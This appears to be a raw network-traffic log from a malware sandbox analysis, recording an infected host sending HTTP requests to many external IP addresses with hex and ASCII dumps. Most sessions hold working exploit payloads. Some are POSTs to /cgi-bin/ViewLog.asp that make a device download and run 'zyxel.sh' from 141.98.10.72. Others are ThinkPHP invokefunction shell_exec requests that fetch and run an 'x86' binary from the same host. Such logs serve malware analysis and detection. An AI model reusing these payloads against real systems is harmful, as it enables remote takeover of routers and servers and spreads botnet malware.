20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 32 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 32 3e 0a 59 6f 75 72 20 72 65 71 75 65 73 74 20 68 61 73 20 62 61 64 20 73 79 6e 74 61 78 20 6f 72 20 69 73 20 69 6e 68 65 72 65 6e 74 6c 79 20 69 6d 70 6f 73 73 69 62 6c 65 20 74 6f 20 73 61 74 69 73 66 79 2e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <HTML> <HEAD><TITLE>400 Bad Request</TITLE></HEAD> <BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"> <H2>400 Bad Request</H2>Your request has bad syntax or is inherently impossible to satisfy.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
263	192.168.2.15	37244	94.123.16.26	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:30.304352999 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
264	192.168.2.15	50312	94.122.106.90	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:30.304411888 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
265	192.168.2.15	51824	95.86.89.35	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:30.304471970 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
266	192.168.2.15	51812	85.84.232.199	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:30.519287109 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:30.764483929 CET	145	IN	HTTP/1.1 401 Unauthorized WWW-Authenticate: Basic realm="Network Camera" Content-Type: text/html Server: Network Camera Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
267	192.168.2.15	33056	95.209.132.225	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:30.545149088 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:31.114104033 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
268	192.168.2.15	34098	85.122.231.251	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:30.648206949 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
269	192.168.2.15	37108	94.137.74.218	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:30.721421957 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:30.962151051 CET	295	IN	HTTP/1.1 404 Not Found Date: Wed, 14 Feb 2024 08:29:30 GMT Content-Type: text/html Content-Length: 150 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
270	192.168.2.15	56576	94.123.92.244	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:30.792958975 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
271	192.168.2.15	58804	94.120.26.14	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:30.797293901 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
272	192.168.2.15	39314	94.120.229.62	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:30.799308062 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
273	192.168.2.15	55270	31.196.74.214	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:31.488595963 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
274	192.168.2.15	58124	94.121.149.114	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:31.738348961 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
275	192.168.2.15	36480	88.12.95.45	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:31.793267012 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:32.015520096 CET	671	IN	Data Raw: 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 76 61 72 73 5b 31 5d 5b 5d 3d Data Ascii: hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 404 Not FoundServer: mini_httpd/1.19 19de

Session ID	Source IP	Source Port	Destination IP	Destination Port
276	192.168.2.15	33758	88.99.29.249	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:32.010329008 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:32.218229055 CET	323	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:29:44 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
277	192.168.2.15	36486	88.12.95.45	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:32.238091946 CET	489	IN	Data Raw: 28 6e 75 6c 6c 29 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6d 69 6e 69 5f 68 74 74 70 64 2f 31 2e 31 39 20 31 39 64 65 63 32 30 30 33 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 31 34 20 46 65 62 20 32 30 32 34 20 Data Ascii: (null) 400 Bad RequestServer: mini_httpd/1.19 19dec2003Date: Wed, 14 Feb 2024 09:31:38 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=%sConnection: close<HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BOD

Session ID	Source IP	Source Port	Destination IP	Destination Port
278	192.168.2.15	41502	95.128.129.61	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:33.421569109 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:33.620564938 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 14 Feb 2024 08:30:28 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
279	192.168.2.15	50378	95.111.232.93	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:33.432164907 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:33.642358065 CET	513	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:29:33 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 319 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 76 6d 69 34 37 32 38 34 39 2e 63 6f 6e 74 61 62 6f 73 65 72 76 65 72 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.29 (Ubuntu) Server at vmi472849.contaboserver.net Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
280	192.168.2.15	36194	95.168.249.26	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:33.449356079 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:33.675309896 CET	113	IN	HTTP/1.1 400 Bad Request Connection: close Content-Type: text/plain Transfer-Encoding: chunked
Feb 14, 2024 09:29:33.676153898 CET	33	IN	Data Raw: 42 0d 0a 42 61 64 20 52 65 71 75 65 73 74 0d 0a 30 0d 0a 0d 0a Data Ascii: BBad Request0

Session ID	Source IP	Source Port	Destination IP	Destination Port
281	192.168.2.15	48484	95.56.57.210	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:33.513112068 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:33.804459095 CET	29	IN	HTTP/1.1 200 OK
Feb 14, 2024 09:29:33.805387974 CET	515	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
282	192.168.2.15	58608	88.99.179.56	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:33.638348103 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:33.844690084 CET	1286	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:29:33 GMT Content-Type: text/html Content-Length: 1982 Connection: close ETag: "52bb30b4-7be" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 43 41 4d 53 43 41 50 45 20 53 45 52 56 49 43 45 53 20 53 52 4c 22 20 2f 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 62 6f 64 79 20 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 65 64 3b 66 6f 6e 74 3a 6e 6f 72 6d 61 6c 20 31 36 70 78 20 41 72 69 61 6c 7d 0a 09 09 64 69 76 23 70 6f 70 75 70 20 7b 6d 61 72 67 69 6e 3a 31 30 30 70 78 20 61 75 74 6f 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 62 6f 72 64 65 72 3a 30 70 78 3b 20 77 69 64 74 68 3a 34 30 30 70 78 3b 20 70 61 64 64 69 6e 67 3a 32 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 7d 0a 09 09 69 6d 67 23 6c 6f 67 6f 20 7b 77 69 64 74 68 3a 33 36 30 70 78 3b 7d 0a 09 09 61 2e 63 61 6d 73 63 61 70 65 2c 61 2e 63 2d 68 6f 73 74 69 6e 67 2c 61 2e 63 2d 73 6f 66 74 77 61 72 65 2c 61 2e 63 2d 61 64 6d 69 6e 20 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 7d 0a 09 09 61 2e 63 61 6d 73 63 61 70 65 7b 63 6f 6c 6f 72 3a 23 32 31 39 31 42 36 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 0a 09 09 61 2e 63 2d 68 6f 73 74 69 6e 67 7b 63 6f 6c 6f 72 3a 72 65 64 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0a 09 09 61 2e 63 2d 73 6f 66 74 77 61 72 65 7b 63 6f 6c 6f 72 3a 62 6c 75 65 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0a 09 09 61 2e 63 2d 61 64 6d 69 6e 7b 63 6f 6c 6f 72 3a 67 72 65 65 6e 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0a 09 09 64 69 76 2e 63 2d 6c 69 6e 6b 73 20 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 78 2d 73 6d 61 6c 6c 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 09 09 64 69 76 2e 6c 65 66 74 